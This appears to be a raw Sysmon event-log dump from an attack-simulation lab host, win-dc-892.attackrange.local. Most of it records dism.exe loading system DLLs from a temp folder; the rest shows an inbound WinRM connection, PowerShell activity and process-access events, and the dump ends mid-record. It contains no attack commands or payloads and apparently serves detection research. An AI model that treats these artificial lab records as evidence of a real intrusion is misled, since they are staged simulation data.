AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processtopology-obsolete-l1-1-0.dllMD5=99E3ACC47F10000AE67A577F5893FD5A,SHA256=AD01524D3FDDC25C91292808E7B333B587C902E996E557885E79CC10F9A66214,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-2.dllMD5=DABFBC1EAB7AEE555F3BAEAF981EC7EB,SHA256=3070505B0B060D9EE9C2B699A518481A22DC15ECAF9603089FCF9EBC022179C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-1.dllMD5=8C5DF20B2E2DE6BA6717A597A951E4F7,SHA256=BE42C78E3F21CD6E74811F27E1B76C4FE8537FB149EF34EA455F22AAA29720ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processthreads-l1-1-0.dllMD5=3D0CD1FE610E55E8C151162004A1429F,SHA256=D43535460D9CF2F2D348E9F2027DAF9FC0C0C906D5066E15F86332C839C94651,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processenvironment-l1-2-0.dllMD5=BB20192D0B22AD2EBBF4960B66D2E164,SHA256=23E758C4F7646AACC2DE8B8930BB272115F726F27E5437DF606E1C2328FA48F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-processenvironment-l1-1-0.dllMD5=2CF62C9CF255C15AD1C8B1CCDD9453D6,SHA256=35CDE2048D4EC8D5D02B1CA57B81B8D5F579541EDBAF5DA4485A6323B8C3A805,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-privateprofile-l1-1-1.dllMD5=FA8EFF9B35BE58F70CD0014DAF108819,SHA256=835F086B0884E8E1689D661657F258FA1E71439672E9F0CC0140D614DAB6FA6F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-privateprofile-l1-1-0.dllMD5=C8490BC5ACB353CAF140CB12670883A2,SHA256=85F3FE5E802843596F466D479111658B08271E48CC1821EB17E6D299D523C95E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-namedpipe-l1-1-0.dllMD5=D8F1E545D80C2045881C7F0525558D80,SHA256=0D9C3D6A6DF364F812D370258C1B3D3F97584E9F7D36569D06746EBA1695D368,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-2.dllMD5=9F77AA276A31F36805DF003F9E66BD99,SHA256=26425008D97A2EA8B95AF52BFE47CF5DE1DE9BB3E25DF77123B85C895192D7D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-1.dllMD5=728A5655624D5B091E8E216BE90D9EF9,SHA256=A2B17F63065CC760FA9CF5D2950D0E13613997546C90CFA1C094CF32171D49ED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-memory-l1-1-0.dllMD5=BA6B6729DC95AA60AF31A160E2CB4533,SHA256=AA433713D5D1DB4413E9F5D938C0C452BAE8EB1BF8CD011803464BBD893BBB08,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-localization-obsolete-l1-2-0.dllMD5=B5727AD79BEBAAB6E6AFA381A28A8E9C,SHA256=C0E101B6BCDDC28A9BA24C7796BBDAAEFC14459E402FD53053F3C23E0D84D040,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-localization-l1-2-1.dllMD5=FD9B6F1EA88B7167E6EC227A61B90888,SHA256=2FEF21096468EE5C6BFC88971AFDB4CC07F6C4669375561863B85023C15684AF,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-localization-l1-2-0.dllMD5=C8420A86D981BB6AA0D32001D234639E,SHA256=2E93EA8BB070C07C39B7F042B7D9843C4B74B3D4E69C8E33D89B0574B2D1D43D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-libraryloader-l1-1-1.dllMD5=787DCDC02E39A27A63B857FF6E819593,SHA256=91A7DEC7B636C00032D122CA04D4B8653B13E1211C54A4184F3955D2398C2E2E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-libraryloader-l1-1-0.dllMD5=AC90FCC4E819CD2EEED5D09A1FA42BAC,SHA256=2DA68FCBCE619BE5A90501F971467B7A894C6A705659346729E1E4E306EEB7D7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Kernel32-Private-L1-1-1.dllMD5=E269D033D63A117DA8F3F855B90CCBFD,SHA256=41437C84BF757CC5758BF381600D0DECB00E8F8F56F11765203B7880AC4CDDD0,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Kernel32-Private-L1-1-0.dllMD5=58B0B7C61F098BD1E73E9C156CB38C64,SHA256=C366B92E7048081C7B336CEAB970BAA20AFDAEE2456820AA38360D1429C27669,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-kernel32-legacy-l1-1-1.dllMD5=912D93DCBE67A1373D93BACD0174E3ED,SHA256=0B94CB7472E0777AEFC1B3208ADDE41B893B78B3223F515FB86348D3362624C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-kernel32-legacy-l1-1-0.dllMD5=8E788763C9CDB6E5D1A313C08F7D621E,SHA256=5604FCC803BE14AD10C7A2372FB19BC80D43AD850109A670676982A4EC961473,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-io-l1-1-1.dllMD5=DC7E345A08B64DDD90906151E1D566E9,SHA256=ABDC082DAA40FCAF14E4E554DF23CFC48533F5A2157BD540BFEC49EB8E31E403,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-io-l1-1-0.dllMD5=A4381D04E233B96B657262DE9B31594C,SHA256=17BE2709D85E6B922BDF5D357FB4CD9416234F8E6685226F5EC776E8B3B5A678,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-interlocked-l1-1-0.dllMD5=39646EB20F4366691E3EFF958C99D1D4,SHA256=262D2C2EBAFFA4276F54B05A5A1DA125CC9DCCAF76EAAD3AAF7B23D54EC33C8E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dllMD5=0C5DE8F3B6CC9B44ED0A0556A02F4867,SHA256=D08261783A1749B08F7423923B00FD77E3B44265889B1F550A64239586BC8FC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-heap-l1-1-0.dllMD5=51EBE577149EABD170684C2668F967ED,SHA256=0091D6C33047D8EF6E0F09E049DF2CABA5EE6B4F5B1870E0A369D3BF6DB72330,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-handle-l1-1-0.dllMD5=F83CB23123F3E4885547ED29F2BD2360,SHA256=495A9EC7C50D6D72F209E1F69C9B0C292D8D32FBE79FE675128786F8E351B988,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.356{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-file-l2-1-1.dllMD5=8B79E85DB9AA6D00794E5151455951BB,SHA256=EE600140599138132439FA9FB9FA6B028A9BF2A206A856CCB1106EFF45459C13,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-file-l2-1-0.dllMD5=455C1AB890C154076E0E23A42F10B6F5,SHA256=DB95D8AA71A8E0A54852C1A83E42267C72E26F2A111AD41146096BF26825FF62,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-2-1.dllMD5=A9808572063E5A5649EA59F8B40FC7A8,SHA256=D4FD5081924D4B544188A687BD37127E0A38AF310E77C55F6EC22896B95B3C9C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-2-0.dllMD5=4438E1D7952A77B7F71FF45EF821814F,SHA256=1C4FA5120E310E49C8112ACB6E594DB2F581AE4B6BA6241EEA4301E0E373959F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-file-l1-1-0.dllMD5=FF5C179E19923B65E650B11283250D50,SHA256=CF84455BC2AADF2960F0AE4D3691BF3032F412578CB2730A27848C6B26D00225,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-fibers-l1-1-1.dllMD5=A263189D905386A2A91CD2EB39D3365D,SHA256=7392027920D102DBE4C2C15590CC471063D6B1456CAA797BB71F8973C60B47FC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-fibers-l1-1-0.dllMD5=A1827E232474C845B7A495D1A4CA6169,SHA256=A95088251923F1233CA4F5675457D6D6B2A1601734D4B5451420298491864746,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-errorhandling-l1-1-1.dllMD5=E98BCC3FA25D6DB36D50786EF08DBADD,SHA256=7BDA00F42BE64BCC1022EC3000FE2582CDF4CC89083D868ACA9DCE982C98C52C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-errorhandling-l1-1-0.dllMD5=14E8A42D84E459F617344438903680EE,SHA256=1FCB6E1908C13B5184373E83B3C13FCF96B55E4FBBC8AAF4D6E9DA604DB75848,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-delayload-l1-1-0.dllMD5=762D2E52FAFE433C50648FC23D7C3E76,SHA256=53238588E10FFAABA96C751D34181BA04A869A0474757E79D9FE82ABC3DC7CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-debug-l1-1-1.dllMD5=1652E7B742F30832826B48E62485BFC7,SHA256=0362AFCDFB6CA89CDEE0DACEC94A5E45D6910B5337343149007DE2443050D154,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-debug-l1-1-0.dllMD5=E02F6786930435C736D71E9B6B898773,SHA256=4C0F43EAC3834878F16175B17427C0195A3213B7CDF9702447667D703AA29B54,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-datetime-l1-1-1.dllMD5=78876D83AA27E510EC3DC3355D034B92,SHA256=44A696C4626AF85EA565D651D7FAF5E21B6EB0C6EE47EE93419D8A7BAD565278,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-datetime-l1-1-0.dllMD5=CF9560A4450AC70C51866581802AE8CC,SHA256=A7A23DC37F028D38D2836CE881FCFF1FD066538588B207BBBCC3B1AB96E3AB62,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-console-l1-1-0.dllMD5=893E267BD0B91FADAC2A2BAE70FD0400,SHA256=17D17AC0383117E9A14D7687ECAA3B27AF1C71B89687A5C3E5B8761B2E64EDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-comm-l1-1-0.dllMD5=C7EC73197892D7F63059C10D19BD5D90,SHA256=768E17ED08111FD22BAAC8FAC00C7DD87F0E57FEFCDAC58CE04B868528B2FDFC,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-com-l1-1-0.dllMD5=08A5A3129DCB52F3C4E51EE3C4A827E7,SHA256=3C6549832275052BCC2234CC4433D95407800ED65359F5147C4762EE0C71F712,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.340{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-base-util-l1-1-0.dllMD5=29CD6DDC6BADE9098B9A4402C6336D62,SHA256=B97C475AA8241C9B674E8C51C387AFAAA7977B036D9E2F7FAFB6CACC11D985BE,IMPHASH=00000000000000000000000000000000truetrue 354300x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.556{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53831-false10.0.1.14win-dc-892.attackrange.local5986- 17141700x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:55.715{266CAFBE-6439-6064-C802-00000000AD01}5052\PSHost.132616655937988506.5052.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.700{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_pvsg4ymw.aqi.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.700{266CAFBE-6439-6064-C802-00000000AD01}5052ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0cwaa5wj.exp.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.325{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0cwaa5wj.exp.ps12021-03-31 11:59:55.325 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.293{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6439-6064-C802-00000000AD01}5052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 